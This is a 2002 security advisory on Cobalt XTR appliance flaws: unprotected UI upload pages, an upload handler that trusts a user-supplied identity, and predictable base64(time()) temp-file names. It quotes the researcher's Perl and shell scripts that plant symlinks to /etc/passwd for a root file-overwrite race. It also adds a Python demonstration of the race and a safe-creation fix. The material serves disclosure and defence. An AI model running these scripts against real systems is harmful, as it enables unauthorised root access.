Cobalt XTR User Interface Access Control Issue and File Uploading Authentication Bug Let Local Users Write to Files with Root Privileges
SecurityTracker Alert ID: 1003778
SecurityTracker URL: http://securitytracker.com/id/1003778
CVE Reference: GENERIC-MAP-NOMATCH
Date: Mar 11 2002
Impact: Modification of system information, Modification of user information, Root access via local system
Exploit Included: Yes
Description:
A vulnerability was reported in the Cobalt XTR appliance user interface. A local user can write files to the system with root privileges.
It is reported that certain portions of the Cobalt XTR user interface (UI) are not password protected (i.e., no .htaccess protection). This allows remote users to access MultiFileUpload.php. Due to an authentication bug in MultiFileUploadHandler.php (which handles upload requests posted from MultiFileUpload.php), a remote user can cause temporary files to be written to the /tmp directory. The handler reportedly accepts user-supplied data to specify the identity of the uploading user, so the upload is performed as whatever account the request names.
It is also reported that the MultiFileUpload.php file uploading code uses a predictable Base64-encoded temporary file name derived from the system time. A local user can precompute the names for an upcoming window and create a symbolic link (symlink) from each predictable temporary file name to a critical file on the system (such as /etc/passwd).
A user can combine both conditions to cause arbitrary files to be written with arbitrary privileges. After setting up the symlinks, the user uploads the target file (such as a replacement /etc/passwd file) through the handler, and the write follows the link and overwrites the linked file:
https://<cobalt_xtr_host>:81/uifc/MultFileUploadHandler.php
The vendor has reportedly been notified.
Impact:
A local user can write to any file with root privileges.
Solution:
No vendor solution was available at the time of this entry.
The author of the report recommends creating a .htaccess file in the uifc directory as a temporary fix.
Vendor URL: www.cobalt.com/products/xtr/
Cause:
Access control error
Underlying OS:
Message History:
None.
Source Message Contents
Date: Fri, 08 Mar 2002 19:32:38 +0100
Subject: Remote Cobalt Raq XTR vulns
-----------------------------------------------------------------
Topic : Combined (Remote/Local root) Cobalt XTR vulnerabilities
Date : 02-03-2002
Author : Wouter ter Maat aka grazer@digit-labs.org
Url : http://www.digit-labs.org
-----------------------------------------------------------------
Description : Some areas of the Cobalt XTR UI are not .htaccess protected;
therefore users can access MultiFileUpload.php from remote.
MultiFileUploadHandler.php handles upload requests posted from MultiFileUpload.php.
Due to an authentication bug in the upload handler, users can write files to the
filesystem as any valid user on the system, including root.
Exploitation : To exploit this vulnerability, you need shell access (or be creative).
----- snippet of MultiFileUpload.php -----
// get uid
$pwnam = posix_getpwnam($PHP_AUTH_USER);
$uid = $pwnam["uid"];
// get filename
$baseName = base64_encode(time());
$fullName = "/tmp/" . $baseName;
------------------------------------------
As you can see, user information is read into $pwnam, which is the return value
of the function posix_getpwnam($PHP_AUTH_USER). PHP_AUTH_USER can be modified to
any desired value (remotely) (I prefer root :P).
The next problem lies in the base64 encoding of the filename, which is
predictable. If you can predict the base64 filenames for, for example, the next
ten minutes (time()), and create symbolic links to /etc/passwd, you will have
exactly ten minutes to exploit the machine.
After the symlinks have been created (the script to create the base64 symlinks is
below), you will need to upload your modified target file (script set to
/etc/passwd).
You can upload your file at
https://<cobalt_xtr_host>:81/uifc/MultFileUploadHandler.php
(if you know how forms work, and understand the authentication error :P).
Quick patch : Create a .htaccess file in the uifc directory.
Vendor status : Sun Cobalt was notified on the day of writing.
-> Exploitation and further technical info can be found here:
http://www.securitydatabase.net/forum/viewtopic.php?TopicID=3665
---------------- local-timerace-xtr.pl -----------------
#!/usr/bin/perl
# mass base64 time encoder
# part of Cobalt UIFC XTR remote/local combination attack
use MIME::Base64;
$evil_time = time();
$exploit_secs = 10; # time in seconds you got to exploit this bug (race)
for($i=1;$i<=$exploit_secs; $i++) {
$evil_time = $evil_time+1;
$evilstr = encode_base64($evil_time);
print $evilstr;
}
-------------------------------------------------------
------------------- symlink-time.sh -------------------
#!/bin/sh
#Script for creating symlinks from output of local-timerace-xtr
for foo in `perl -x local-timerace-xtr.pl`
do
ln -s /etc/passwd $foo
done
-------------------------------------------------------
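The temporary-file half of the bug, as an added illustration that is not part of the advisory or of the author's scripts: it reproduces the base64(time()) naming scheme in a scratch directory, shows a plain open() following a pre-planted symlink into a constructed stand-in for /etc/passwd, and shows that creating the same name with O_CREAT|O_EXCL|O_NOFOLLOW fails instead of writing through the link (a mkstemp()-style random name removes the guessable name altogether). It assumes a Linux host with Python 3 and does not model the PHP_AUTH_USER identity bug.

```python
import base64
import errno
import os
import tempfile
import time

def predictable_name(ts):
    """The advisory's scheme: base64 of the epoch second, so anyone can precompute it."""
    return base64.b64encode(str(int(ts)).encode()).decode()

def vulnerable_write(upload_dir, data, ts):
    """Mirrors the snippet: guessable name and a plain open() that follows symlinks."""
    path = os.path.join(upload_dir, predictable_name(ts))
    with open(path, "wb") as fh:  # a pre-planted link redirects the bytes elsewhere
        fh.write(data)

def exclusive_write(path, data):
    """Same path, but O_CREAT|O_EXCL|O_NOFOLLOW errors out instead of reusing a planted link."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)

def demo():
    """Plant a link at the next second's name in a scratch dir; report each writer's outcome."""
    work = tempfile.mkdtemp()
    target = os.path.join(work, "passwd")  # constructed stand-in for /etc/passwd
    with open(target, "w") as fh:
        fh.write("root:x:0:0::/root:/bin/sh\n")
    uploads = os.path.join(work, "tmp")
    os.mkdir(uploads)
    ts = int(time.time()) + 1
    planted = os.path.join(uploads, predictable_name(ts))
    os.symlink(target, planted)  # the race: the link exists before the upload lands
    vulnerable_write(uploads, b"attacker:x:0:0::/:/bin/sh\n", ts)
    with open(target) as fh:
        clobbered = fh.read().startswith("attacker")  # True: the link was followed
    try:
        exclusive_write(planted, b"x")
        refused = False
    except OSError as exc:
        refused = exc.errno in (errno.EEXIST, errno.ELOOP)  # True: creation refused
    return {"clobbered": clobbered, "refused": refused}

if __name__ == "__main__":
    print(demo())
```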